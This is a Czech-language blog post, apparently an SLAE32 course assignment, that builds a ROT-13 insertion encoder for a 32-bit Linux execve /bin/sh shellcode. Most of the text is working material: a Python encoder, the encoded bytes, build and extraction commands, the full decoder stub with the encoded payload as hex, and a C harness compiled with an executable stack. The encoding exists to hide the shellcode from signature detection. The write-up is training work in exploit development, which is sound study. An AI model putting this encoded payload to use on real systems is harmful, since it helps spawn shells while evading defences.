Ve čtvrtém textu této 32bitové série bude vytvořeno custom encoding schéma fungující na principu insertion encoderu s execve-stack jako shellcodem.

Pro custom encoder použiji velmi jednoduchou šifru ROT-13 pro každý byte.

#!/usr/bin/env python
# Filename: decoder.py
# Author: SLAE-14209
 
shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
 
rot = 13
max = 256 - rot
 
encoded = ""
encoded2 = []
 
for x in bytearray(shellcode):
    if x < max:
        encoded += '\\x%02x' % (x + rot)
        encoded2.append('0x%02x' % (x + rot))
    else:
        encoded += '\\x%02x' % (rot - 256 + x)
        encoded2.append('0x%02x' % (rot - 256 + x))
 
print "Encoded:\n%s\n" % encoded
 
print "Encoded2:\n%s\n" % ','.join(encoded2)

Encodovaný shellcode:

0x3e,0xcd,0x5d,0x75,0x3c,0x3c,0x80,0x75,0x75,0x3c,0x6f,0x76,0x7b,0x96,0xf0,0x5d,0x96,0xef,0x60,0x96,0xee,0xbd,0x18,0xda,0x8d

Všechny použité soubory můžete nalézt zde: https://github.com/Pal1Sec/SLAE32/blob/master/Assignment%204/decoder.nasm

Zkompilujeme:

• nasm -f elf32 -o decoder.o decoder.nasm
• ld decoder.o -o decoder
• objdump -d decoder -M intel
  • no nullbytes
• objdump -d ./decoder|grep ‘[0-9a-f]:’|grep -v ‘file’|cut -f2 -d:|cut -f1-6 -d’ ‘|tr -s ‘ ‘|tr ‘\t’ ‘ ‘|sed ‘s/ $//g’|sed ‘s/ /\\x/g’|paste -d ” -s |sed ‘s/^/”/’|sed ‘s/$/”/g’

“\xeb\x24\x5e\x31\xc9\xb1\x19\x80\x3e\x0d\x7c\x05\x80\x2e\x0d\xeb\x10\x31\xd2\xb2\x0d\x2a\x16\x31\xdb\xb3\xff\x43\x66\x29\xd3\x88\x1e\x46\xe2\xe3\xeb\x05\xe8\xd7\xff\xff\xff\x3e\xcd\x5d\x75\x3c\x3c\x80\x75\x75\x3c\x6f\x76\x7b\x96\xf0\x5d\x96\xef\x60\x96\xee\xbd\x18\xda\x8d”

#include <stdio.h>
#include <string.h>
 
unsigned char code[] =
// Decoder stub:
"\xeb\x24\x5e\x31\xc9\xb1\x19\x80\x3e\x0d\x7c\x05\x80\x2e\x0d\xeb\x10\x31\xd2\xb2\x0d\x2a\x16\x31\xdb\xb3\xff\x43\x66\x29\xd3\x88\x1e\x46\xe2\xe3\xeb\x05\xe8\xd7\xff\xff\xff"
// Encoded shellcode:
"\x3e\xcd\x5d\x75\x3c\x3c\x80\x75\x75\x3c\x6f\x76\x7b\x96\xf0\x5d\x96\xef\x60\x96\xee\xbd\x18\xda\x8d";
 
int main(void) {
    printf("Shellcode Length:  %d\n", strlen(code));
    int (*ret)() = (int(*)())code;
    ret();
}

• gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
• ./shellcode